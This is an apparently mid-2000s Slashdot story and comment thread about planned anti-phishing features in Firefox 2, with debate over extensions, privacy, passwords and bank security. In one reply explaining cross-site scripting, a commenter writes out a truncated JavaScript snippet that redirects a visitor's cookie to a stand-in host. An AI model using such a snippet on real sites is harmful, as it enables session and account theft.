Firefox 2 To Have Anti-Phishing Technology 229
Mitchell Bronze writes "Mozilla's Mike Shaver said in an interview that the upcoming Firefox 2 will have anti-phishing capability using technology that might come from Google." From the article: "With the continued rise in online attacks, security tools have become something Web browser makers can use to try to stand out. Microsoft plans to include features to protect Web surfers against online scams in Internet Explorer 7, due later in 2006. Similar functionality is already in Netscape 8 and Opera 8, both released last year. 'It is another example of the energy that has returned to the browser market,' Shaver said."
Good on ya (Score:2, Funny)
[rimshot]
Re:Good on ya (Score:5, Interesting)
And I cannot emphasize enough how great it is for my parents. By switching them to Fox and Bird, I have stopped my monthy trip up to remove all new spyware/viruses... now I just go for dinner. That gets an A+ in my book.
Re:Good on ya (Score:5, Insightful)
Yeah well, the reply on the support forums to any memory problems is always "must be extensions at fault", and it's almost certainly true. The thing is, ask me to choose between Firefox without extensions and Opera, and there is no contest, Opera wins hands down.
I think the Firefox team should be focussing on ways to ensure that extensions behave. They could do any number of things. Put together a team of people whose job it is to check extensions for obvious flaws, and make a list of "approved" extensions that pass muster. Improve the APIs used by extension developers. Work on tools to help extension developers write robust code. Seems to me more useful than some of the stuff they're working for. That's not to say they haven't done a great job so far, I just think that would be a useful thing to focus on at this point.
Re:Good on ya (Score:4, Insightful)
Open 5 or 6 IE windows, then add up the resource usage for IE, plus the resource usage of any and all spyware processes running, plus any plug-ins for IE. Compare this total usage to Firefox memory usage, having the same pages loaded in tabs.
THEN tell me Firefox is a memory hog.
Re:Good on ya (Score:3, Insightful)
Re:Good on ya (Score:4, Funny)
Re:Good on ya (Score:4, Funny)
It's most likely you just don't know how to read. The phrase "when Windows starts paging" it has nothing to do with 'ps' or Linux memory management.
Re:Good on ya (Score:2)
What does Linux memory management have to do with Windows?
Re:Good on ya (Score:4, Funny)
This is Slashdot. Linux has everything to do with everything, newbie.
Re:Good on ya (Score:2)
Re:Good on ya (Score:5, Informative)
If I remember correctly, it's something to do with cacheing the pages. Firefox caches something like 25 previous pages you've been to... on each tab.
Maybe this isn't the actual problem -- I'm not a developer -- but it seems to have stopped the "memory leak" issue I have with Firefox 1.5+
Re:Good on ya (Score:3, Interesting)
Re:Good on ya (Score:5, Informative)
No one is denying that there are memory leaks. However, they're not common (occuring on only about 1% of visited pages) and often very hard to reproduce reliably. You can help by using the memory leak tool and reporting good memory leak bugs [dbaron.org].
Re:Good on ya (Score:3, Informative)
The Back-Forward cache causes immediate increased use of memory, just after loading a few pages. The increased memory due to memory leaks doesn't become apparent until after visiting hundreds of pages and several DOM Wi
Re:Good on ya (Score:2, Insightful)
Microsoft anti-phishing? (Score:5, Funny)
Site Blocked: www.google.com has been placed on a list of sites that link to potentially unsafe and / or phishing sites.
An opportunity, a threat... (Score:5, Interesting)
Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored. This starts with Mails that urge him to open something "really urgently", covers various plugins for Browsers that come filled with spyware (which, in turn, is a perfect door for other malware) and goes to bogus files on various P2P networks that claim to be some crack, hack or other "goodie" to lure the P2P user into starting it.
Now, you can walk the same way that antivirus companies go, you wait for the threat to unfold and grab it at its neck when you find it lurking in the system once your update covers it. That's fine as long as your releases at least match the speed of trojan development, if there is some intersection between the moment you update your anti-trojan signatures and the moment the trojan goes into a new generation.
And that window is closing. Fast. We're now facing trojans with update cycles that make you wonder when and how they create them. Currently, you face about weekly updates of some trojans. For the simple reason that there is no reason to update them more often. It is technically no problem to have them update twice a day. That's already a rate that no antivirus company could match. The AV company first of all needs to get a hold of the trojan, develop reliable signatures, create an update for the sigs and send them towards you.
Currently, AV companies can keep up with development. The trojan writers have enough clueless people without any antivirus protection who click everything and anything and allow every program to do whatever it pleases on the web, so they don't care about "us", those who have av tools and/or know how to keep their computer clean.
As soon as a browser like this hits the market, the race is on. It does no longer matter if you're clueless or an IT-pro, your browser will keep you out of way's harm on everything it knows. So, to be successful, the phishers have to be faster (or develop a new strategy, whichever is easier to do).
I'm not sure if AV companies can win that game if it becomes one of update speeds. A trojan writer has to push one update for one trojan. The AV company has to push a few 100 for about as many malware programs. Not a good position for the AV guys.
My hope is that Firefox will have a different approach to the problem. Self-checking processes (to avoid injections), close scrutiny of its BHOs, etc. I hope they will not try to use AV techniques, but instead concentrate on the entry points for such a program, and try to detect it there.
Re:An opportunity, a threat... (Score:2)
Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored.
So which one is it? "The linkest weak is the user" or "vulnerabilities aside, the weakest link is the user"
I would suggest that its option B - "vulnerabilities aside, the weakest link is the user"
I would say that Slammer / Blaster / Code Red / etc infected far more people in a far shorter period of time then any via-user link.
In fact, I'
Re:An opportunity, a threat... (Score:5, Insightful)
But each of those would have been avoided if the user either kept their machines patched or (at least) kept them behind a firewall.
Re:An opportunity, a threat... (Score:2)
What you say is correct - but failing to keep your machine patched & behind a firewall is not generally whats meant by a vulnerability requiring user intervention.
When the grandparent talked about the user being the weak link in the chain, he
Re:An opportunity, a threat... (Score:2)
Re:An opportunity, a threat... (Score:2)
Windows is mostly so "insecure" because it pays to look for even the most obscure flaw in the system. That WMF exploit is a good example of a well hidden exploit. I know I'll get some flak from the anti-MS faction here for saying it, but Windows is not so much more insecure than Linux. It's just way more rewarding to spend time hunting some flaw hidden deeply in the system that requires you to jump through a million hoops in Windows.
Es
Re:An opportunity, a threat... (Score:5, Insightful)
One of the things I demand to use this system is the ability to limit how it is used, turn it off, switch it for an alternative system, or uninstall it. The best way it can be implemented is as an pre-installed plugin, making it easy to maintain for those who need need alternatives.
Firefox was always intended to be plugin based, so I hope they stick to that.
Re:An opportunity, a threat... (Score:5, Insightful)
This aside, I agree that it should be possible to turn it off. Even though this would essentially kill the security of the system, but I'm firmly against handing over responsibility over my system to someone else, who I'd have to trust implicitly. And what if I don't?
But I'd also recommend delivering it with a default ON setting on the security features. Just to make sure that all those who have no clue what's going on in their computer have it ON!
Re:An opportunity, a threat... (Score:5, Insightful)
The biggest problem is still the weakest link in the system: Its user.
I very strongly disagree. There are currently many weaker links.
Vulnerabilities aside, the user is what is responsible for over 90 percent of the infections monitored...
Either I'm misunderstanding your statement or you are misinformed. Most infections do not currently involve human interaction measured both by number and bandwidth consumed.
Currently, you face about weekly updates of some trojans. For the simple reason that there is no reason to update them more often. It is technically no problem to have them update twice a day. That's already a rate that no antivirus company could match. The AV company first of all needs to get a hold of the trojan, develop reliable signatures, create an update for the sigs and send them towards you.
Actually, there are also self-mutating trojans that have been demonstrated that are very good at hiding and there are trojans that interfere with anti-virus.
Currently, AV companies can keep up with development. The trojan writers have enough clueless people without any antivirus protection who click everything and anything and allow every program to do whatever it pleases on the web, so they don't care about "us", those who have av tools and/or know how to keep their computer clean.
First, AV companies are not keeping up and we have seen several "zero-day" infections. More advanced intrusion detection software is becoming more and more responsible for finding new worms, viruses, and trojans on end users systems, a significant amount of time in advance of AV signatures. These systems are not only finding them, but creating and sharing signatures among major ISPs.
Second, your depiction of the average user as people who "click everything and anything and allow every program to do whatever it pleases" is very misleading. I know security experts who have been duped by a well crafted trojan or phishing e-mail and the truth of the matter is, users are making poor choices based upon the fact that they are given poor options. Right now the average user is given the option of "open this file if it is a file or run it if it is a program and let it do anything it wants" or "don't open this file or program." Since users want to view data and install software, eventually they are bound to make the wrong choice.
It will not be until users are given more control, information, and granularity by their tools that they will be given the option of being the weakest link. UI's need to let them know what is data and what is an executable. OS's need to run executables in sandboxes by default and only allow programs to do unusual things (log other program's keystrokes, modify the OS, access hardware directly, modify user files, connect to the internet, access the e-mail address book, access the buddy list, start a new service, modify other programs, etc.) after the user is informed in plain English and given a choice using a properly constructed UI. At this point, users will become the weakest link and not before.
As soon as a browser like this hits the market, the race is on. It does no longer matter if you're clueless or an IT-pro, your browser will keep you out of way's harm on everything it knows. So, to be successful, the phishers have to be faster (or develop a new strategy, whichever is easier to do).
First, the Web is only one vector and not even the most common vector for infection. Second, blacklists will never be able to keep up, although they will help.
I'm not sure if AV companies can win that game if it becomes one of update speeds. A trojan writer has to push one update for one trojan. The AV company has to push a few 100 for about as many malware programs. Not a good position for the AV guys.
Newer intrusion detection systems are they key to mitigating this. Propagation is detectable and if you have a relational model of your network abnormal activity can be flagged, detected
Re:An opportunity, a threat... (Score:2)
It is indeed a problem that the user can only execute it or not. Then again, how many users do you see that could make a sensible decision given the information what a given program does? Worse, what if he is tricked by the program into allowing it?
Let's imagine a scenario. You're a Joe Average user. You get a mail, supposedly from your bank, telling you that they were attacked and send you this way a tool to make sure you're out of harm's way. Yo
Re:An opportunity, a threat... (Score:3, Insightful)
As soon as the user believes what the mail tells him, he will do ANYTHING you tell him. He will grant you any permit you want, actually telling him what kind of security warnings he'll get even increases your credibility. Because, well, would an attacker tell him that?
This is not true in many cases. For example, if someone can successfully trick a user into thinking an executable is from their bank, they may still become suspicious when the program tries to do certain things. These things might include r
Re:An opportunity, a threat... (Score:2)
I 100% agree.
But who are the users? Joe Sixpack (I miss that guy around here
I believe that everybody that uses the system is a user, and that the online banks and retailers are more responsible for securing the data than the "end user". Otherwise, why not just pay cash and keep our money under our mattresses? What service are the banks and online retailers providing for the average
Re:An opportunity, a threat... (Score:3, Insightful)
The problem with online banking is that you have to trust an untrustworthy client: The one on the user's side. You have no control at all over his machine. Banks don't even know who they're talking to, the trojan or to the user? And they have no way of knowing.
Especially when dealing with man in the middle attacks (the ones going 'rou
Re:An opportunity, a threat... (Score:2)
Keys and tokens. The bank gives me ID cards when I go and do business at the teller window, many have pictures embedded in them now, but they check nothing besides a minimum of 4 character ascii string when I do online banking.
They also have cameras at banks, they have a finite storefront, compared to the internet where its almost infinite as to who or what script can "go to
Re:An opportunity, a threat... (Score:2)
In other words, whatever keys you have, the trojan does as well. At some point, it HAS to go into the computer, and that's when the trojan gets access to it.
Banks ARE secure. The point of attack is the user's PC.
Here's to hoping... (Score:3, Funny)
Re:Here's to hoping... (Score:3)
Re:Here's to hoping... (Score:2)
More appropriate as an extension? (Score:5, Insightful)
Seems like something that could be its own extension, or if Google is really so involved, integrated into the Google Toolbar for Firefox.
Re:More appropriate as an extension? (Score:5, Insightful)
Yes.
The users most susceptible to phishing are also the ones least likely to seek out and install an extension ("what's that?") to prevent it.
If more savvy users are concerned about bloat perhaps this protection could be optional with the default for it to be turned on.
Re:More appropriate as an extension? (Score:2)
Re:More appropriate as an extension? (Score:5, Informative)
After all, the technology is a sole contribution of Google and their Safe Browsing extension http://www.google.com/tools/firefox/safebrowsing/ [google.com]
For more detail regarding the implementation see http://wiki.mozilla.org/Safe_Browsing [mozilla.org]
Re:More appropriate as an extension? (Score:5, Insightful)
Re:More appropriate as an extension? (Score:2)
Kind of like Microsoft does.
Re:More appropriate as an extension? (Score:2)
All I'm saying is that email is just a new delivery vehicle for the same tired old scam, rehashed for the 21st century.
The best way to prevent these attacks is to make it harder for the scammers to win.
By that logic... (Score:2)
But the users most susceptible to phishing are also the ones least likely to seek out and install an alternative browser.
Re:More appropriate as an extension? (Score:5, Informative)
Re:More appropriate as an extension? (Score:3, Interesting)
Re:More appropriate as an extension? (Score:5, Informative)
TFA: Seems like something that could be its own extension, or if Google is really so involved, integrated into the Google Toolbar for Firefox.
TFA:
Re:More appropriate as an extension? (Score:3, Informative)
It already is an extension... (Score:2)
It basically checks websites you visit against its database and tells you if they are considered dangerous or what have you.
Re:It already is an extension... (Score:3, Interesting)
So it reports my surfing to google's database? Thanks but no thanks. I've never fallen pray to phishing attacks, and don't want a feature like that logging all the pr0n sites I visit. Wait, the only pr0n site I need is google images now anyway haha!
Why should we trust google? They are looking out for their shareholder, not the end user.
Re:It already is an extension... (Score:2)
If you honestly consider what websites you visit to be some kind of major secret, then by all means, don't use these sort of extensions.
Me, I don't much care who knows what websites I go to. It's just not a major secret that I read slashdot and digg and a few other online forums and such.
As for porn... dude, porn websites are so late 90's. Go retro with usenet!
Re:More appropriate as an extension? (Score:2)
An extension would protect people who don't need protection.
A better solution is one that by default puts a warning over any dubious link and lets the user decide. If you're an expert user and the warning annoys you, you are in a position to disable it from the prefs. Everyone else can benefit from greater security
Smart move (Score:5, Interesting)
Re:Smart move (Score:2)
Since the updates would happen when you're online - why wouldn't you be able to update? If you can check your email you can get the updates...right?
I like AVG much better than any other anti-virus - even without specific detection rules it can guess (with a reasonable degree of accuracy) if a file is infected or not.
I agree with that, however a basyian t
Already there (Score:5, Informative)
Is this a free alternative to Verisign? (Score:5, Interesting)
Verisign [verisignsecured.com] already has this kind of techology, the question is, will Firefox 2 make Verisign obsolete?
Verisign's advice: [verisignsecured.com] The best way to avoid becoming a victim of phishing is to never respond to unsolicited emails asking for personal information or directing you to a Web site where you are asked to enter personal information--even if it looks TOTALLY official.
Click OK (Score:4, Funny)
Enter information and click OK to find out
Name:_________________________________
Billing Address:__________________________________
Credit Card Type:________________
Credit Card Number:_______________________________
Expiration Date:___/___
Now be an idiot and click OK to let me steal your info.
Re:Click OK (Score:3, Funny)
Name:_Ford_Prefect__________
Billing Address:_72_Borchester_Road,_Ambridge,_Borchester
Credit Card Type:_VISA__________
Credit Card Number:_4242-0563-1337-0584______
Expiration Date:Mar/2008
P.S.: I'm using Safari!
Privacy concerns? (Score:5, Interesting)
STOP CALLING IT TECHNOLOGY!!! (Score:2, Insightful)
Thinking up ways to warn people about phishing
It's sad, really (Score:5, Insightful)
Guess I have to change the browser then (Score:3, Insightful)
Unless you can disable this "feature" or it works completely differently, I'd consider Firefox 2 spyware.
Re:Guess I have to change the browser then (Score:5, Informative)
Google tells you exactly what the feature is, and throws the option to enable or disable it in your face, and yet you still whine about it.
Re:Guess I have to change the browser then (Score:2)
Re:Guess I have to change the browser then (Score:2)
The problem with that, is that someday, someone may decrypt their anti-phishing database (because putting it in plain text would be monstrously stupid) and then overwrite it when some new FF exploit shows up.
That's the only legitimate reason I thought of.
Of course, if they're going to be sneaky about it, there's no reason malware writers couldn't just overwrite your hosts file to redir
Re:Guess I have to change the browser then (Score:2)
Re:Guess I have to change the browser then (Score:2)
Re:Guess I have to change the browser then (Score:2)
Perhaps it's my comment [slashdot.org] you're referring to.
Online scams? (Score:5, Funny)
> Microsoft plans to include features to protect Web surfers
> against online scams in Internet Explorer 7
Wouldn't it have been easier just to not program the online scams into Internet Explorer 7 in the first place? I just don't understand Microsoft's new security procedures at all!
Damnit (Score:5, Interesting)
Seriously, I'll tell you the only anti-phishing technology we need: our damn heads, with a side of common sense.
I don't want my browser to have stupid coddling features like this that will just get in the way of a decent, savvy surfer. That's the problem with popularity - it leads to diluting the quality. I'd rather have a *good* browser only used by 3% of the people out there. Hell, the mere minority status might even make it *better* - now that Firefox is popular, more and more sites are finding ways of advertising specifically to it.
If Firefox 2 does have this, then it better be easy to fully disable, otherwise I'm definitely not upgrading.
Re:Damnit (Score:3, Insightful)
Re:Damnit (Score:2, Interesting)
Good (Score:3, Interesting)
Re:Good (Score:2)
Actually, I think I got stuck testing it just to piss me off.
What about cookie theft prevention? (Score:4, Insightful)
Re:What about cookie theft prevention? (Score:2)
To what specifically are you referring when you say "cookie redirection"? It sounds to me more like the online game you were playing has an XSS security hole. In that case, there's no "cookie redirection" going on, it's you accessing your game account in a way the online game tells your browser to. The fact that the online game was tricked into doing so isn't something a browser can ascertain, because it's something that happens between the attacker and the game.
Re:What about cookie theft prevention? (Score:2)
When a user is able to add their own scripting on someone else's site. Sites like myspace and neopets, for example, allows users to add video, pics, etc. to their pages on a website. If they were able to add Javascript like:
<a href="#" onclick="window.location='http://example.com/stole
then they could snag your cookie and access your account. Make it onlo
Re:What about cookie theft prevention? (Score:2)
From the browser's perspective, there's no "user" code and "website" code, it's all "website" code. So it becomes an issue of telling the difference between a website telling the browser to do something benign, and a website telling the browser to do something harmful. Can you think of a good way of differentiating between the two? That won't break things for legitimate users?
Saying that "Ideally, the website should restrict..." is a huge understatement. Such websites are simply insecure, and should
Open source a problem here? (Score:3, Interesting)
(Seriously. If not, please post why not and educate me.)
Re:Open source a problem here? (Score:2)
It is something like with encryption, the fact that openSSH source code is available does not make the encryption algorithms less secure, it is the design of the algorithms what is secure.
Re:Open source a problem here? (Score:5, Informative)
(Seriously. If not, please post why not and educate me.)
No, it won't, for the simple reason that obscurity does not provide security. Whether the source code is available or not, it's always possible for a smart hacker to figure out how a program works. So whenever you're doing anything related to security, you assume that the bad guy knows every last detail about your code does what it does. And you design your code so that that doesn't matter.
For example, if you're blocking phishing attempts by having a database of known phishing sites (which is how the Netcraft toolbar works, IIRC), then it doesn't really help the phishers to know the details of exactly how your browser connects to the database and looks up their URL in it. Because even though they know what's happening, there isn't actually anything they can do to stop it happening.
I suppose there are schemes that could be defeated by seeing the source. For example, a naive scheme that tried to identify phishing sites by running a fixed series of tests on them (check if site is in Russia but claims to be American bank, check URL to see if it contains dodgy characters, etc) would be slightly weaker in open source code because the tests would be visible for all to see. But such a scheme would be basically useless anyway - not because it's open source, but because it would be a fundamentally weak technique.
Anti-phishing should be done at the website level (Score:4, Informative)
Companies should be responsible for protecting their users, and this struck me as a rather good way of doing that. Granted, if someone really wanted to, they could set up a site just to scarf your user id, log in with that id to snag your site key, then create another site with the site key included to gank your password - but that's a lot of work.
Re:Anti-phishing should be done at the website lev (Score:3, Insightful)
The real answer. IMHO, is using public keys for authorisation, as you're then never sending anything that can be used again. Man in the middle attacks are still possible if you can persuade the user to accept the wrong server certificate, but it's as good as it gets, IMHO.
The user's key doesn't even have to be signed - ju
Re:Anti-phishing should be done at the website lev (Score:2)
Why does it ask me to log in, then to - essentially - log in again?
And bookmarks to the sitekey login page do not work.
I use online banking way too much to tolerate such bullshit. I thought about switching banks to get away from sitekey!
Almost as annoying as their autotimeout, which thankfully my friend wrote a greasemonkey script to nullify.
They put so much effort into making their site secure and hard to phish that they made it a royal fucking pain in the a
anti-phishing == no passwords (Score:5, Insightful)
When are people going to realize that passwords are not secure. Ever. Even if you pick a "good" password and change it every 13 minutes like a good boy, they are still not secure.
Why? Its too easy to snag the password from social engineering or some other means or even by accident.
I walked out of the bank disgusted when I went to get a private lock box, and it did not have a key given to me, and the bank had the other key like before. No, now they wanted me to remember a password, and enter it into a computer to unlock my box.
OK. I made that up, because even banks are not stupid enough to do this, but they open up the account online to any bozo that has a password.
My bank recently initiated an "anti-phishing" technology where it uses cookies stored on my computer and if the bank does not recognize my computer it displays a picture that I set up in the past with a caption that I selected for the picture, and then its supposed to be OK to put in my password now because the site is providing evidence that the bank and not some guy from China or Russia is asking for my password.
However, I carry many bank cards in my wallet, and they work excellent at stores and ATMs, but they don't fit into any holes into my computer. The bank has already given me an excellent token that is much more difficult to replicate than a few random characters on a keyboard, but they refuse to use it.
OK, I have to go and change my passwords now, its that time of year....
Re:anti-phishing == no passwords (Score:2, Interesting)
Re:anti-phishing == no passwords (Score:3, Insightful)
Re:anti-phishing == no passwords (Score:3, Insightful)
OK, remind me. Money has been around how long?
Fighting "phishing", user education, and global law enforcement is very, very new and nonexistent at this time.
I'm arguing that passwords are causal, and not correlational here.
I've never been "phished" for the key to my house, nobody but someone I already trust to some degree deserves that, but when online banks _refuse_ to put their login page on a SSL secured site, an
Re:anti-phishing == no passwords (Score:2)
OK. I made that up, because even banks are not stupid enough to do this.
Why would they? Did you miss the 5-10 surveilance cameras scanning the teller front line when you walked in?
Brillian Idea (Score:2)
Coloured URLs and URLs displayed always (Score:3, Insightful)
- colouring of URLs in the address bar, or something else, that would allow the novice user to easily identify the user name element of a URL. I have already see URLs of the form (http excluded):
- even in a window that has no tool bar or status bar, there should always be an status bar that displays the page's address.
Re:Coloured URLs and URLs displayed always (Score:3, Informative)
Opera solves it by displaying "You're about to go to address containing username" and displays which one is username and which is server name.
Mozilla's Current Documentation (Score:2, Informative)
Here is a some design documentation for the safe browsing add-on: http://wiki.mozilla.org/Safe_Browsing:_Design_Docu mentation [mozilla.org]
Here is the Bugzilla bug for turning on the feature. Remember that you have to copy and paste the link into the address bar because Bugzilla blocks slashdot. https://bugzilla.mozilla.org/show_bug.cgi?id=32929 2 [mozilla.org]
From what I understand, the idea is to make the feature an extension that is installed by default, kind of like the talkback error reporting tool. In "normal mode", th
Is this a web browser or SMTP client issue? (Score:2)
And speaking of anti-phishing, how about a program that flood
Phishing in Firefox / Mozilla - a long lived issue (Score:5, Insightful)
Anyway, I'd argue that Thunderbird needs it much more than Firefox. Most phishing starts with the inbox. Links in email that use dodgy hex encoding, raw IPs, IPv6, point to domains that differ than the anchor text etc. should be highlighted. And popular targets such as banks, ebay, Paypal, Amazon etc. should be explicitly identified. I'd also like Thunderbird to add a phishing filter rule so that I can automatically toss the 20+ phishing emails I get a day straight in the junk folder without accidentally training the bayesian filter to kill genuine emails from Amazon, PayPal etc.
Site Advisor (Score:2)
Verbatim from the site:
About SiteAdvisor
SiteAdvisor is a consumer software company founded in April 2005 by a group of MIT engineers who wanted to make the Web safer for their family and friends. Having spent one too many holiday breaks trying to clean a mess of spam, adware, and spyware from our families' computers, we decided to take action.
We realized there was a gaping hole in existing Web security products. While traditional security companies had gotten relatively good at addressi
Re:Netscape (Score:2)
Re:Firefox not for geeks anymore? (Score:2, Insightful)
Will Firefox not pop up a warning, saying something akin to "Hey, you can go ahead and visit this site if you like, but we think it might be a bit fishy"? Doesn't seem that bad.
I would assume that Firefox won't prevent you from accessing a certain site, since I can't imagine the Mozilla Foundation wanting to coordinate universal white-/black-lists.
Re:Firefox not for geeks anymore? (Score:2)
That's a little bit too long for "most" users, which have entered the habit of clicking on everything.
The correct prompt to open up is "Are you a terrorist? \n Only terrorists may access this site.", with yes/no. This prompt is accurrate, since these phishers probably support some gang or terrorism group. In addition, you'd have
Re:Now IE fans... (Score:3, Insightful)
The summary already states that this kind of antiphishing is already available in Nestcape 8, Opera and several toolbars and extensions.
At least the grand parent said 'their' meaning that only fools will believe that this is original to MS.
Re:Now IE fans... (Score:2, Insightful)
Re:Now IE fans... (Score:2)
Tabs have been around for a while and really aren't neccessary. Most of us power users have gotten used to them and actually require them to be productive.
RSS, take it or leave it. That's a natural evolution towards information gathering and any user application is going to get it regardless of 'who got it first'.
The anti-Phishing is nothing more than user security. Firefox has been under constant development for a while so why can't this be on their roadmap and i